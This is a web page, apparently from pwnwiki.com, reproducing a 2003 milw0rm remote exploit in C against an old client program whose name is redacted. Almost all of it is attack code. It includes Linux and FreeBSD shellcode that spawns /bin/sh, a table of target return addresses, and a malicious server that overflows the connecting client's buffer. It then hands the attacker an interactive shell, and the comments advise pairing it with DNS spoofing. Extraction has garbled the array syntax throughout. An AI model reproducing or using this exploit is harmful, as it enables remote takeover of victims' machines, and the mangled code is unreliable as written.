pwnwiki.com
,
EXP
/* email protected exploit by zillionatsafemode.org (2003/01/07) Credits for the vulnerability go to: SkyLined <email protected> http://spoor12.edup.tudelft.nl/SkyLined%20v4.2/?Advisories/email protected Use this exploit in combination with a DNS spoofing utility such as the one provided in the Dsniff package. http://naughty.monkey.org/~dugsong/dsniff/ */ #include <unistd.h> #include <sys/stat.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <errno.h> #include <stdio.h> #define NOP 0x41 #define EXEC "TERM=xterm; export TERM=xterm;exec /bin/sh -i" #define EXEC2 "id;uname -a;" char linux_shellcode = /* dup */ "\x31\xc9\x31\xc0\x31\xdb\xb3\x04\xb0\x3f\xcd\x80\xfe\xc1\xb0" "\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80" /* execve /bin/sh */ "\x31\xdb\x31\xc9\xf7\xe3\x53\x68\x6e\x2f\x73\x68\x68\x2f\x2f" "\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"; char freebsd_shellcode = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb1\x03\xbb\xff\xff\xff\xff" "\xb2\x04\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01\x75\xf3" "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f" "\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53" "\xb0\x3b\x50\xcd\x80"; char static_crap = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; struct target { int num; char *description; char *versions; char *type; char *shellcode; long retaddress; int bufsize; int offset; int junk; }; struct target targets = { {0, "Linux 2.2.* ", "3.03.i386 linux-gnu-gnulibc2.1 ", "Packet retr mode", linux_shellcode, 0xbffff420, 520, 500, 0}, {1, "Linux 2.4.* ", "3.03 i386/i686 linux-gnu-gnulibc2.1 ", "Packet retr mode", linux_shellcode, 0xbffff390, 520, 500, 1}, {2, "Linux 2.* ", "3.03.i386/i686 linux-gnulibc1-static", "Packet retr mode", linux_shellcode, 0xbffff448, 520, 500, 1}, {3, "All above ", "3.03.i386 linux* ", "Packet retr mode", linux_shellcode, 0xbffff448, 520, 300, 1}, {4, "FreeBSD ", "3.03.i386 FreeBSD-2.2.8 ", "Packet retr mode", freebsd_shellcode, 0x0004956c, 520, 1, 2}, {5, NULL, NULL, NULL, NULL, 0, 0, 0} }; int open_socket(int port) { int sock,fd; struct sockaddr_in cliAddr, servAddr; sock = socket(AF_INET, SOCK_STREAM, 0); if(sock<0) { printf("Error: Cannot open socket \n"); exit(1); } /* bind server port */ servAddr.sin_family = AF_INET; servAddr.sin_addr.s_addr = htonl(INADDR_ANY); servAddr.sin_port = htons(port); if(bind(sock, (struct sockaddr *) &servAddr, sizeof(servAddr))<0) { printf("Error: Cannot bind to port %d \n",port); exit(1); } listen(sock,5); fd=accept(sock,0,0); return fd; } void usage(char *progname) { int i; printf("\n---------------------------------------------------"); printf("\n *- email protected remote exploit by zillion (s-m0de) -*"); printf("\n---------------------------------------------------"); printf("\n\nDefault : %s -h <target host>",progname); printf("\nTarget : %s -t <number>",progname); printf("\nOffset : %s -o <offset>",progname); printf("\nPort : %s -p <port>\n",progname); printf("\nDebug : %s -d \n",progname); printf("\nAvailable types:\n"); printf("---------------------------------------------------\n"); for(i = 0; targetsi.description; i++) { fprintf(stdout, "%d\t%s\t%s\t%s\n", targetsi.num, targetsi.description,targetsi. versions,targetsi.type); } printf("\n\n"); exit(0); } int sh(int sockfd) { char snd1024, rcv1024; fd_set rset; int maxfd, n,test; strcpy(snd, EXEC "\n"); write(sockfd, snd, strlen(snd)); read(sockfd,rcv,7); fflush(stdout); strcpy(snd, EXEC2 "\n"); write(sockfd, snd, strlen(snd)); /* Main command loop */ for (;;) { FD_SET(fileno(stdin), &rset); FD_SET(sockfd, &rset); maxfd = ( ( fileno(stdin) > sockfd )?fileno(stdin):sockfd ) + 1; select(maxfd, &rset, NULL, NULL, NULL); if (FD_ISSET(fileno(stdin), &rset)) { bzero(snd, sizeof(snd)); fgets(snd, sizeof(snd)-2, stdin); write(sockfd, snd, strlen(snd)); } if (FD_ISSET(sockfd, &rset)) { bzero(rcv, sizeof(rcv)); if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) { /* exit */ return 0; } if (n < 0) { perror("read"); return 1; } fputs(rcv, stdout); fflush(stdout); } } /* for(;;) */ } int main(int argc, char **argv){ char *buffer,*tmp; long retaddress; char rcv200; int fd,i,arg,debug=0,type=0,port=80,offset=250; if(argc < 2) { usage(argv0); } while ((arg = getopt (argc, argv, "dh:o:l:p:t:")) != -1){ switch (arg){ case 'd': debug = 1; break; case 'o': offset = atoi(optarg); break; case 'p': port = atoi(optarg); break; case 't': type = atoi(optarg); break; default : usage(argv0); } } if((targetstype.retaddress) != 0) { buffer = (char *)malloc((targetstype.bufsize)); /* some junk may be required to counter buffer manipulation */ if(targetstype.junk == 1) { tmp = (char *)malloc(strlen(static_crap) + strlen(targetstype.shellcode)); strcpy(tmp,targetstype.shellcode); strcat(tmp,static_crap); targetstype.shellcode = tmp; } memset(buffer,NOP,targetstype.bufsize); memcpy(buffer + (targetstype.bufsize) - (strlen(targetstype.shellcode) + 8) ,targetstype. shellcode,strlen(targetstype.shellcode)); /* Overwrite EBP and EIP */ *(long *)&buffer(targetstype.bufsize) - 8 = (targetstype.retaddress - targetstype.offset); // If freebsd we need to place a value without 00 in ebp if(type == 4) { *(long *)&buffer(targetstype.bufsize) - 8 = 0xbfbff654; } *(long *)&buffer(targetstype.bufsize) - 4 = (targetstype.retaddress - targetstype.offset); /* Uncomment to overwrite eip and ebp with 41414141 */ if(debug == 1) { *(long *)&buffer(targetstype.bufsize) - 8 = 0x41414141; *(long *)&buffer(targetstype.bufsize) - 4 = 0x41414141; } } fd = open_socket(port); write(fd,buffer,strlen(buffer)); write(fd,"\n",1); write(fd,"\n",1); sleep(1); sh(fd); close(fd); return 0; } // milw0rm.com 2003-04-08
PWNWIK.COM
